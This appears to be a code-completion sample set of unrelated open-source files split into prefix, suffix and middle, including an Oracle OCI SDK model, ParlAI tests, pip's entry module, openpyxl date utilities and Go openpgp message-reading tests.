fn | (&self) -> Bound<&T> {
Included(self.end)
}
}
| end_bound |
create_digital_assistant_version_details.py | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .create_digital_assistant_details import CreateDigitalAssistantDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateDigitalAssistantVersionDetails(CreateDigitalAssistantDetails):
"""
Properties that are required to create a new version of an existing Digital Assistant.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateDigitalAssistantVersionDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.oda.models.CreateDigitalAssistantVersionDetails.kind` attribute
of this class is ``VERSION`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param kind:
The value to assign to the kind property of this CreateDigitalAssistantVersionDetails.
Allowed values for this property are: "NEW", "CLONE", "VERSION", "EXTEND"
:type kind: str
:param category:
The value to assign to the category property of this CreateDigitalAssistantVersionDetails.
:type category: str
:param description:
The value to assign to the description property of this CreateDigitalAssistantVersionDetails.
:type description: str
:param platform_version:
The value to assign to the platform_version property of this CreateDigitalAssistantVersionDetails.
:type platform_version: str
:param multilingual_mode:
The value to assign to the multilingual_mode property of this CreateDigitalAssistantVersionDetails.
Allowed values for this property are: "NATIVE", "TRANSLATION"
:type multilingual_mode: str
:param primary_language_tag:
The value to assign to the primary_language_tag property of this CreateDigitalAssistantVersionDetails.
:type primary_language_tag: str
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateDigitalAssistantVersionDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateDigitalAssistantVersionDetails.
:type defined_tags: dict(str, dict(str, object))
:param id:
The value to assign to the id property of this CreateDigitalAssistantVersionDetails.
:type id: str
:param version:
The value to assign to the version property of this CreateDigitalAssistantVersionDetails.
:type version: str
"""
self.swagger_types = { | 'kind': 'str',
'category': 'str',
'description': 'str',
'platform_version': 'str',
'multilingual_mode': 'str',
'primary_language_tag': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'id': 'str',
'version': 'str'
}
self.attribute_map = {
'kind': 'kind',
'category': 'category',
'description': 'description',
'platform_version': 'platformVersion',
'multilingual_mode': 'multilingualMode',
'primary_language_tag': 'primaryLanguageTag',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'id': 'id',
'version': 'version'
}
self._kind = None
self._category = None
self._description = None
self._platform_version = None
self._multilingual_mode = None
self._primary_language_tag = None
self._freeform_tags = None
self._defined_tags = None
self._id = None
self._version = None
self._kind = 'VERSION'
@property
def id(self):
"""
**[Required]** Gets the id of this CreateDigitalAssistantVersionDetails.
The unique identifier of the Digital Assistant to create a new version of.
:return: The id of this CreateDigitalAssistantVersionDetails.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this CreateDigitalAssistantVersionDetails.
The unique identifier of the Digital Assistant to create a new version of.
:param id: The id of this CreateDigitalAssistantVersionDetails.
:type: str
"""
self._id = id
@property
def version(self):
"""
**[Required]** Gets the version of this CreateDigitalAssistantVersionDetails.
The resource's version. The version can only contain numbers, letters, periods, underscores, dashes or spaces. The version must begin with a letter or a number.
:return: The version of this CreateDigitalAssistantVersionDetails.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this CreateDigitalAssistantVersionDetails.
The resource's version. The version can only contain numbers, letters, periods, underscores, dashes or spaces. The version must begin with a letter or a number.
:param version: The version of this CreateDigitalAssistantVersionDetails.
:type: str
"""
self._version = version
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other | |
issue-4366.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// regression test for issue 4366
// ensures that 'use foo:*' doesn't import non-public 'use' statements in the
// module 'foo'
#![feature(globs)]
use m1::*;
mod foo {
pub fn foo() {}
}
mod a {
pub mod b {
use foo::foo;
type bar = int;
}
pub mod sub {
use a::b::*;
fn sub() -> int { foo(); 1 } //~ ERROR: unresolved name `foo`
}
}
mod m1 {
fn | () {}
}
fn main() {}
| foo |
__init__.py | # sping:: pyart
| from pidPyart import * |
|
repl.py | #!/usr/bin/python3
class Evaluator:
def __init__(self, lexer):
self.__lexer = lexer
def | (self, line):
return int(next(self.__lexer.tokenize(line)).raw_value)
class REPL:
def __init__(self, read, print, evaluate):
self.__read = read
self.__eval = evaluate
self.__print = print
def loop(self):
while True:
try:
line = self.__read('mm-i> ')
result = self.__eval(line)
self.__print(result)
except KeyboardInterrupt:
break
if __name__ == '__main__':
from lexer import Lexer
REPL(input, print, Evaluator(Lexer()).evaluate).loop()
| evaluate |
test_other_scripts.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Catch all for a number of "other" scripts.
"""
import os
import unittest
import parlai.utils.testing as testing_utils
class TestConvertToParlaiFormat(unittest.TestCase):
def test_convert(self):
from parlai.scripts.convert_data_to_parlai_format import (
ConvertDataToParlaiFormat,
)
with testing_utils.tempdir() as tmpdir:
fn = os.path.join(tmpdir, 'parlai.txt')
ConvertDataToParlaiFormat.main(
task='integration_tests:nocandidate', outfile=fn
)
with open(fn) as f:
assert (
f.readline() == 'text:4 1 3 2\tlabels:4 1 3 2\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:3 0 4 1\tlabels:3 0 4 1\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:5 1 6 3\tlabels:5 1 6 3\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:4 5 6 2\tlabels:4 5 6 2\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:0 5 3 1\tlabels:0 5 3 1\tepisode_done:True\n'
)
assert f.readline() == '\n'
class TestVerifyData(unittest.TestCase):
def test_verify_data(self):
from parlai.scripts.verify_data import VerifyData
report = VerifyData.main(task='integration_tests')
assert report['did_not_return_message'] == 0
assert report['empty_string_label_candidates'] == 0
assert report['exs'] == 500
assert report['label_candidates_with_missing_label'] == 0
assert report['missing_label_candidates'] == 0
assert report['missing_labels'] == 0
assert report['missing_text'] == 0
class TestVacuum(unittest.TestCase):
def test_vacuum(self):
with testing_utils.tempdir() as tmpdir:
from parlai.scripts.vacuum import Vacuum
model_file = os.path.join(tmpdir, 'model')
valid, test = testing_utils.train_model(
{
'task': 'integration_tests',
'optimizer': 'adam',
'learningrate': 0.01,
'model_file': model_file,
'num_epochs': 0.05,
'skip_generation': True,
'batchsize': 8,
# TODO: switch to test_agents/unigram
'model': 'transformer/generator',
'ffn_size': 32,
'embedding_size': 32,
'n_layers': 1,
}
)
size_before = os.stat(model_file).st_size
Vacuum.main(model_file=model_file)
size_after = os.stat(model_file).st_size
assert size_after < size_before
assert os.path.exists(model_file + '.unvacuumed')
valid2, test2 = testing_utils.eval_model(
{'task': 'integration_tests', 'model_file': model_file, 'batchsize': 8}
)
for key in ['loss', 'exs', 'ppl', 'token_acc']:
assert valid2[key] == valid[key], f"{key} score doesn't match"
assert test2[key] == test[key], f"{key} score doesn't match"
class TestDetectOffensive(unittest.TestCase):
def test_offensive(self):
from parlai.scripts.detect_offensive_language import DetectOffensive
report = DetectOffensive.main(
task='babi:task1k:10', datatype='valid', safety='string_matcher'
)
assert report['string_offenses%'] == 0
assert report['word_offenses'] == 0
assert report['exs'] == 100
class TestParty(unittest.TestCase):
def test_party(self):
from parlai.scripts.party import Party
Party.main(seconds=0.01)
class TestDataStats(unittest.TestCase):
def test_simple(self):
from parlai.scripts.data_stats import DataStats
report = DataStats.main(task='integration_tests')
assert report['both/avg_utterance_length'] == 4
assert report['input/avg_utterance_length'] == 4
assert report['labels/avg_utterance_length'] == 4
assert report['both/tokens'] == 4000
assert report['input/tokens'] == 2000
assert report['labels/tokens'] == 2000
assert report['both/unique_tokens'] == 7
assert report['input/unique_tokens'] == 7
assert report['labels/unique_tokens'] == 7
assert report['both/unique_utterances'] == 500
assert report['input/unique_utterances'] == 500
assert report['labels/unique_utterances'] == 500
assert report['both/utterances'] == 1000
assert report['input/utterances'] == 500
assert report['labels/utterances'] == 500
class TestProfileTrain(unittest.TestCase):
"""
Test profile_train doesn't crash.
"""
def test_cprofile(self):
from parlai.scripts.profile_train import ProfileTrain
with testing_utils.tempdir() as tmpdir:
ProfileTrain.main(
task='integration_tests:overfit',
model='test_agents/unigram',
model_file=os.path.join(tmpdir, 'model'),
skip_generation=True,
)
def | (self):
from parlai.scripts.profile_train import ProfileTrain
with testing_utils.tempdir() as tmpdir:
ProfileTrain.main(
task='integration_tests:overfit',
model='test_agents/unigram',
torch=True,
model_file=os.path.join(tmpdir, 'model'),
skip_generation=True,
)
@testing_utils.skipUnlessGPU
def test_torch_cuda(self):
from parlai.scripts.profile_train import ProfileTrain
with testing_utils.tempdir() as tmpdir:
ProfileTrain.main(
task='integration_tests:overfit',
model='test_agents/unigram',
torch_cuda=True,
model_file=os.path.join(tmpdir, 'model'),
skip_generation=True,
)
class TestTokenStats(unittest.TestCase):
def test_token_stats(self):
from parlai.scripts.token_stats import TokenStats
from parlai.core.metrics import dict_report
results = dict_report(TokenStats.main(task='integration_tests:multiturn'))
assert results == {
'exs': 2000,
'max': 16,
'mean': 7.5,
'min': 1,
'p01': 1,
'p05': 1,
'p10': 1,
'p25': 4,
'p50': 7.5,
'p75': 11.5,
'p90': 16,
'p95': 16,
'p99': 16,
'p@128': 1,
}
| test_torch |
server-request.go | package main
import "github.com/truauth/truauth/pkg/pgdb" | // ServiceRequest service request struct used to pass service information.
type ServiceRequest struct {
PGCreds *pgdb.DbCreds
} | |
__init__.py | #!/usr/bin/env python
from __future__ import absolute_import
import locale
import logging
import os
import sys
import warnings
# 2016-06-17 [email protected]: urllib3 1.14 added optional support for socks,
# but if invoked (i.e. imported), it will issue a warning to stderr if socks
# isn't available. requests unconditionally imports urllib3's socks contrib
# module, triggering this warning. The warning breaks DEP-8 tests (because of
# the stderr output) and is just plain annoying in normal usage. I don't want
# to add socks as yet another dependency for pip, nor do I want to allow-stder
# in the DEP-8 tests, so just suppress the warning. pdb tells me this has to
# be done before the import of pip.vcs.
from pip._vendor.urllib3.exceptions import DependencyWarning
warnings.filterwarnings("ignore", category=DependencyWarning) # noqa
# We want to inject the use of SecureTransport as early as possible so that any
# references or sessions or what have you are ensured to have it, however we
# only want to do this in the case that we're running on macOS and the linked
# OpenSSL is too old to handle TLSv1.2
try:
import ssl
except ImportError:
pass
else:
# Checks for OpenSSL 1.0.1 on MacOS
if sys.platform == "darwin" and ssl.OPENSSL_VERSION_NUMBER < 0x1000100f:
try:
from pip._vendor.urllib3.contrib import securetransport
except (ImportError, OSError):
pass
else:
securetransport.inject_into_urllib3()
from pip._internal.cli.autocompletion import autocomplete
from pip._internal.cli.main_parser import parse_command
from pip._internal.commands import commands_dict
from pip._internal.exceptions import PipError
from pip._internal.utils import deprecation
from pip._vendor.urllib3.exceptions import InsecureRequestWarning
logger = logging.getLogger(__name__)
# Hide the InsecureRequestWarning from urllib3
warnings.filterwarnings("ignore", category=InsecureRequestWarning)
def main(args=None):
| if args is None:
args = sys.argv[1:]
# Configure our deprecation warnings to be sent through loggers
deprecation.install_warning_logger()
autocomplete()
try:
cmd_name, cmd_args = parse_command(args)
except PipError as exc:
sys.stderr.write("ERROR: %s" % exc)
sys.stderr.write(os.linesep)
sys.exit(1)
# Needed for locale.getpreferredencoding(False) to work
# in pip._internal.utils.encoding.auto_decode
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error as e:
# setlocale can apparently crash if locale are uninitialized
logger.debug("Ignoring error %s when setting locale", e)
command = commands_dict[cmd_name](isolated=("--isolated" in cmd_args))
return command.main(cmd_args) |
|
datetime.py | from __future__ import absolute_import
from __future__ import division
# Copyright (c) 2010-2015 openpyxl
"""Manage Excel date weirdness."""
# Python stdlib imports
import datetime
from datetime import timedelta, tzinfo
import re
from jdcal import (
gcal2jd,
jd2gcal,
MJD_0
)
from openpyxl.compat import lru_cache
# constants
MAC_EPOCH = datetime.date(1904, 1, 1)
WINDOWS_EPOCH = datetime.date(1899, 12, 30)
CALENDAR_WINDOWS_1900 = sum(gcal2jd(WINDOWS_EPOCH.year, WINDOWS_EPOCH.month, WINDOWS_EPOCH.day))
CALENDAR_MAC_1904 = sum(gcal2jd(MAC_EPOCH.year, MAC_EPOCH.month, MAC_EPOCH.day))
SECS_PER_DAY = 86400
EPOCH = datetime.datetime.utcfromtimestamp(0)
W3CDTF_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
W3CDTF_REGEX = re.compile('(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})(.(\d{2}))?Z?')
def datetime_to_W3CDTF(dt):
"""Convert from a datetime to a timestamp string."""
return datetime.datetime.strftime(dt, W3CDTF_FORMAT)
def W3CDTF_to_datetime(formatted_string):
"""Convert from a timestamp string to a datetime object."""
match = W3CDTF_REGEX.match(formatted_string)
dt = [int(v) for v in match.groups()[:6]]
return datetime.datetime(*dt)
@lru_cache()
def to_excel(dt, offset=CALENDAR_WINDOWS_1900):
jul = sum(gcal2jd(dt.year, dt.month, dt.day)) - offset
if jul <= 60 and offset == CALENDAR_WINDOWS_1900:
jul -= 1
if hasattr(dt, 'time'):
jul += time_to_days(dt)
return jul
@lru_cache()
def from_excel(value, offset=CALENDAR_WINDOWS_1900):
if value is None:
return
if 1 < value < 60 and offset == CALENDAR_WINDOWS_1900:
value += 1
parts = list(jd2gcal(MJD_0, value + offset - MJD_0))
_, fraction = divmod(value, 1)
jumped = (parts[-1] == 0 and fraction > 0)
diff = datetime.timedelta(days=fraction)
if 0 < abs(value) < 1:
return days_to_time(diff)
if not jumped:
return datetime.datetime(*parts[:3]) + diff
else:
return datetime.datetime(*parts[:3] + [0])
class GMT(tzinfo):
def utcoffset(self, dt):
return timedelta(0)
def dst(self, dt):
return timedelta(0)
def tzname(self,dt):
return "GMT"
try:
from datetime import timezone
UTC = timezone(timedelta(0))
except ImportError:
# Python 2.6
UTC = GMT()
@lru_cache()
def time_to_days(value):
|
@lru_cache()
def timedelta_to_days(value):
"""Convert a timedelta value to fractions of a day"""
if not hasattr(value, 'total_seconds'):
secs = (value.microseconds +
(value.seconds + value.days * SECS_PER_DAY) * 10**6) / 10**6
else:
secs =value.total_seconds()
return secs / SECS_PER_DAY
@lru_cache()
def days_to_time(value):
mins, seconds = divmod(value.seconds, 60)
hours, mins = divmod(mins, 60)
return datetime.time(hours, mins, seconds, value.microseconds)
| """Convert a time value to fractions of day"""
if value.tzinfo is not None:
value = value.astimezone(UTC)
return (
(value.hour * 3600)
+ (value.minute * 60)
+ value.second
+ value.microsecond / 10**6
) / SECS_PER_DAY |
read_test.go | // Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package openpgp
import (
"bytes"
_ "crypto/sha512"
"encoding/hex"
"io"
"io/ioutil"
"strings"
"testing"
"github.com/eyupsaral/crypto/openpgp/armor"
"github.com/eyupsaral/crypto/openpgp/errors"
)
func readerFromHex(s string) io.Reader {
data, err := hex.DecodeString(s)
if err != nil {
panic("readerFromHex: bad input")
}
return bytes.NewBuffer(data)
}
func TestReadKeyRing(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(testKeys1And2Hex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 2 || uint32(kring[0].PrimaryKey.KeyId) != 0xC20C31BB || uint32(kring[1].PrimaryKey.KeyId) != 0x1E35246B {
t.Errorf("bad keyring: %#v", kring)
}
}
func TestRereadKeyRing(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(testKeys1And2Hex))
if err != nil {
t.Errorf("error in initial parse: %s", err)
return
}
out := new(bytes.Buffer)
err = kring[0].Serialize(out)
if err != nil {
t.Errorf("error in serialization: %s", err)
return
}
kring, err = ReadKeyRing(out)
if err != nil {
t.Errorf("error in second parse: %s", err)
return
}
if len(kring) != 1 || uint32(kring[0].PrimaryKey.KeyId) != 0xC20C31BB {
t.Errorf("bad keyring: %#v", kring)
}
}
func TestReadPrivateKeyRing(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(testKeys1And2PrivateHex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 2 || uint32(kring[0].PrimaryKey.KeyId) != 0xC20C31BB || uint32(kring[1].PrimaryKey.KeyId) != 0x1E35246B || kring[0].PrimaryKey == nil {
t.Errorf("bad keyring: %#v", kring)
}
}
func TestReadDSAKey(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(dsaTestKeyHex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 1 || uint32(kring[0].PrimaryKey.KeyId) != 0x0CCC0360 {
t.Errorf("bad parse: %#v", kring)
}
}
func TestReadP256Key(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(p256TestKeyHex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 1 || uint32(kring[0].PrimaryKey.KeyId) != 0x5918513E {
t.Errorf("bad parse: %#v", kring)
}
}
func TestDSAHashTruncatation(t *testing.T) |
func TestGetKeyById(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
keys := kring.KeysById(0xa34d7e18c20c31bb)
if len(keys) != 1 || keys[0].Entity != kring[0] {
t.Errorf("bad result for 0xa34d7e18c20c31bb: %#v", keys)
}
keys = kring.KeysById(0xfd94408d4543314f)
if len(keys) != 1 || keys[0].Entity != kring[0] {
t.Errorf("bad result for 0xa34d7e18c20c31bb: %#v", keys)
}
}
func checkSignedMessage(t *testing.T, signedHex, expected string) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
md, err := ReadMessage(readerFromHex(signedHex), kring, nil, nil)
if err != nil {
t.Error(err)
return
}
if !md.IsSigned || md.SignedByKeyId != 0xa34d7e18c20c31bb || md.SignedBy == nil || md.IsEncrypted || md.IsSymmetricallyEncrypted || len(md.EncryptedToKeyIds) != 0 || md.DecryptedWith != (Key{}) {
t.Errorf("bad MessageDetails: %#v", md)
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("error reading UnverifiedBody: %s", err)
}
if string(contents) != expected {
t.Errorf("bad UnverifiedBody got:%s want:%s", string(contents), expected)
}
if md.SignatureError != nil || md.Signature == nil {
t.Errorf("failed to validate: %s", md.SignatureError)
}
}
func TestSignedMessage(t *testing.T) {
checkSignedMessage(t, signedMessageHex, signedInput)
}
func TestTextSignedMessage(t *testing.T) {
checkSignedMessage(t, signedTextMessageHex, signedTextInput)
}
// The reader should detect "compressed quines", which are compressed
// packets that expand into themselves and cause an infinite recursive
// parsing loop.
// The packet in this test case comes from Taylor R. Campbell at
// http://mumble.net/~campbell/misc/pgp-quine/
func TestCampbellQuine(t *testing.T) {
md, err := ReadMessage(readerFromHex(campbellQuine), nil, nil, nil)
if md != nil {
t.Errorf("Reading a compressed quine should not return any data: %#v", md)
}
structural, ok := err.(errors.StructuralError)
if !ok {
t.Fatalf("Unexpected class of error: %T", err)
}
if !strings.Contains(string(structural), "too many layers of packets") {
t.Fatalf("Unexpected error: %s", err)
}
}
var signedEncryptedMessageTests = []struct {
keyRingHex string
messageHex string
signedByKeyId uint64
encryptedToKeyId uint64
}{
{
testKeys1And2PrivateHex,
signedEncryptedMessageHex,
0xa34d7e18c20c31bb,
0x2a67d68660df41c7,
},
{
dsaElGamalTestKeysHex,
signedEncryptedMessage2Hex,
0x33af447ccd759b09,
0xcf6a7abcd43e3673,
},
}
func TestSignedEncryptedMessage(t *testing.T) {
for i, test := range signedEncryptedMessageTests {
expected := "Signed and encrypted message\n"
kring, _ := ReadKeyRing(readerFromHex(test.keyRingHex))
prompt := func(keys []Key, symmetric bool) ([]byte, error) {
if symmetric {
t.Errorf("prompt: message was marked as symmetrically encrypted")
return nil, errors.ErrKeyIncorrect
}
if len(keys) == 0 {
t.Error("prompt: no keys requested")
return nil, errors.ErrKeyIncorrect
}
err := keys[0].PrivateKey.Decrypt([]byte("passphrase"))
if err != nil {
t.Errorf("prompt: error decrypting key: %s", err)
return nil, errors.ErrKeyIncorrect
}
return nil, nil
}
md, err := ReadMessage(readerFromHex(test.messageHex), kring, prompt, nil)
if err != nil {
t.Errorf("#%d: error reading message: %s", i, err)
return
}
if !md.IsSigned || md.SignedByKeyId != test.signedByKeyId || md.SignedBy == nil || !md.IsEncrypted || md.IsSymmetricallyEncrypted || len(md.EncryptedToKeyIds) == 0 || md.EncryptedToKeyIds[0] != test.encryptedToKeyId {
t.Errorf("#%d: bad MessageDetails: %#v", i, md)
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("#%d: error reading UnverifiedBody: %s", i, err)
}
if string(contents) != expected {
t.Errorf("#%d: bad UnverifiedBody got:%s want:%s", i, string(contents), expected)
}
if md.SignatureError != nil || md.Signature == nil {
t.Errorf("#%d: failed to validate: %s", i, md.SignatureError)
}
}
}
func TestUnspecifiedRecipient(t *testing.T) {
expected := "Recipient unspecified\n"
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2PrivateHex))
md, err := ReadMessage(readerFromHex(recipientUnspecifiedHex), kring, nil, nil)
if err != nil {
t.Errorf("error reading message: %s", err)
return
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("error reading UnverifiedBody: %s", err)
}
if string(contents) != expected {
t.Errorf("bad UnverifiedBody got:%s want:%s", string(contents), expected)
}
}
func TestSymmetricallyEncrypted(t *testing.T) {
firstTimeCalled := true
prompt := func(keys []Key, symmetric bool) ([]byte, error) {
if len(keys) != 0 {
t.Errorf("prompt: len(keys) = %d (want 0)", len(keys))
}
if !symmetric {
t.Errorf("symmetric is not set")
}
if firstTimeCalled {
firstTimeCalled = false
return []byte("wrongpassword"), nil
}
return []byte("password"), nil
}
md, err := ReadMessage(readerFromHex(symmetricallyEncryptedCompressedHex), nil, prompt, nil)
if err != nil {
t.Errorf("ReadMessage: %s", err)
return
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("ReadAll: %s", err)
}
expectedCreationTime := uint32(1295992998)
if md.LiteralData.Time != expectedCreationTime {
t.Errorf("LiteralData.Time is %d, want %d", md.LiteralData.Time, expectedCreationTime)
}
const expected = "Symmetrically encrypted.\n"
if string(contents) != expected {
t.Errorf("contents got: %s want: %s", string(contents), expected)
}
}
func testDetachedSignature(t *testing.T, kring KeyRing, signature io.Reader, sigInput, tag string, expectedSignerKeyId uint64) {
signed := bytes.NewBufferString(sigInput)
signer, err := CheckDetachedSignature(kring, signed, signature)
if err != nil {
t.Errorf("%s: signature error: %s", tag, err)
return
}
if signer == nil {
t.Errorf("%s: signer is nil", tag)
return
}
if signer.PrimaryKey.KeyId != expectedSignerKeyId {
t.Errorf("%s: wrong signer got:%x want:%x", tag, signer.PrimaryKey.KeyId, expectedSignerKeyId)
}
}
func TestDetachedSignature(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
testDetachedSignature(t, kring, readerFromHex(detachedSignatureHex), signedInput, "binary", testKey1KeyId)
testDetachedSignature(t, kring, readerFromHex(detachedSignatureTextHex), signedInput, "text", testKey1KeyId)
testDetachedSignature(t, kring, readerFromHex(detachedSignatureV3TextHex), signedInput, "v3", testKey1KeyId)
incorrectSignedInput := signedInput + "X"
_, err := CheckDetachedSignature(kring, bytes.NewBufferString(incorrectSignedInput), readerFromHex(detachedSignatureHex))
if err == nil {
t.Fatal("CheckDetachedSignature returned without error for bad signature")
}
if err == errors.ErrUnknownIssuer {
t.Fatal("CheckDetachedSignature returned ErrUnknownIssuer when the signer was known, but the signature invalid")
}
}
func TestDetachedSignatureDSA(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(dsaTestKeyHex))
testDetachedSignature(t, kring, readerFromHex(detachedSignatureDSAHex), signedInput, "binary", testKey3KeyId)
}
func TestMultipleSignaturePacketsDSA(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(dsaTestKeyHex))
testDetachedSignature(t, kring, readerFromHex(missingHashFunctionHex+detachedSignatureDSAHex), signedInput, "binary", testKey3KeyId)
}
func TestDetachedSignatureP256(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(p256TestKeyHex))
testDetachedSignature(t, kring, readerFromHex(detachedSignatureP256Hex), signedInput, "binary", testKeyP256KeyId)
}
func testHashFunctionError(t *testing.T, signatureHex string) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
_, err := CheckDetachedSignature(kring, nil, readerFromHex(signatureHex))
if err == nil {
t.Fatal("Packet with bad hash type was correctly parsed")
}
unsupported, ok := err.(errors.UnsupportedError)
if !ok {
t.Fatalf("Unexpected class of error: %s", err)
}
if !strings.Contains(string(unsupported), "hash ") {
t.Fatalf("Unexpected error: %s", err)
}
}
func TestUnknownHashFunction(t *testing.T) {
// unknownHashFunctionHex contains a signature packet with hash
// function type 153 (which isn't a real hash function id).
testHashFunctionError(t, unknownHashFunctionHex)
}
func TestMissingHashFunction(t *testing.T) {
// missingHashFunctionHex contains a signature packet that uses
// RIPEMD160, which isn't compiled in. Since that's the only signature
// packet we don't find any suitable packets and end up with ErrUnknownIssuer
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
_, err := CheckDetachedSignature(kring, nil, readerFromHex(missingHashFunctionHex))
if err == nil {
t.Fatal("Packet with missing hash type was correctly parsed")
}
if err != errors.ErrUnknownIssuer {
t.Fatalf("Unexpected class of error: %s", err)
}
}
func TestReadingArmoredPrivateKey(t *testing.T) {
el, err := ReadArmoredKeyRing(bytes.NewBufferString(armoredPrivateKeyBlock))
if err != nil {
t.Error(err)
}
if len(el) != 1 {
t.Errorf("got %d entities, wanted 1\n", len(el))
}
}
func TestReadingArmoredPublicKey(t *testing.T) {
el, err := ReadArmoredKeyRing(bytes.NewBufferString(e2ePublicKey))
if err != nil {
t.Error(err)
}
if len(el) != 1 {
t.Errorf("didn't get a valid entity")
}
}
func TestNoArmoredData(t *testing.T) {
_, err := ReadArmoredKeyRing(bytes.NewBufferString("foo"))
if _, ok := err.(errors.InvalidArgumentError); !ok {
t.Errorf("error was not an InvalidArgumentError: %s", err)
}
}
func testReadMessageError(t *testing.T, messageHex string) {
buf, err := hex.DecodeString(messageHex)
if err != nil {
t.Errorf("hex.DecodeString(): %v", err)
}
kr, err := ReadKeyRing(new(bytes.Buffer))
if err != nil {
t.Errorf("ReadKeyring(): %v", err)
}
_, err = ReadMessage(bytes.NewBuffer(buf), kr,
func([]Key, bool) ([]byte, error) {
return []byte("insecure"), nil
}, nil)
if err == nil {
t.Errorf("ReadMessage(): Unexpected nil error")
}
}
func TestIssue11503(t *testing.T) {
testReadMessageError(t, "8c040402000aa430aa8228b9248b01fc899a91197130303030")
}
func TestIssue11504(t *testing.T) {
testReadMessageError(t, "9303000130303030303030303030983002303030303030030000000130")
}
// TestSignatureV3Message tests the verification of V3 signature, generated
// with a modern V4-style key. Some people have their clients set to generate
// V3 signatures, so it's useful to be able to verify them.
func TestSignatureV3Message(t *testing.T) {
sig, err := armor.Decode(strings.NewReader(signedMessageV3))
if err != nil {
t.Error(err)
return
}
key, err := ReadArmoredKeyRing(strings.NewReader(keyV4forVerifyingSignedMessageV3))
if err != nil {
t.Error(err)
return
}
md, err := ReadMessage(sig.Body, key, nil, nil)
if err != nil {
t.Error(err)
return
}
_, err = ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Error(err)
return
}
// We'll see a sig error here after reading in the UnverifiedBody above,
// if there was one to see.
if err = md.SignatureError; err != nil {
t.Error(err)
return
}
if md.SignatureV3 == nil {
t.Errorf("No available signature after checking signature")
return
}
if md.Signature != nil {
t.Errorf("Did not expect a signature V4 back")
return
}
return
}
const testKey1KeyId = 0xA34D7E18C20C31BB
const testKey3KeyId = 0x338934250CCC0360
const testKeyP256KeyId = 0xd44a2c495918513e
const signedInput = "Signed message\nline 2\nline 3\n"
const signedTextInput = "Signed message\r\nline 2\r\nline 3\r\n"
const recipientUnspecifiedHex = "848c0300000000000000000103ff62d4d578d03cf40c3da998dfe216c074fa6ddec5e31c197c9666ba292830d91d18716a80f699f9d897389a90e6d62d0238f5f07a5248073c0f24920e4bc4a30c2d17ee4e0cae7c3d4aaa4e8dced50e3010a80ee692175fa0385f62ecca4b56ee6e9980aa3ec51b61b077096ac9e800edaf161268593eedb6cc7027ff5cb32745d250010d407a6221ae22ef18469b444f2822478c4d190b24d36371a95cb40087cdd42d9399c3d06a53c0673349bfb607927f20d1e122bde1e2bf3aa6cae6edf489629bcaa0689539ae3b718914d88ededc3b"
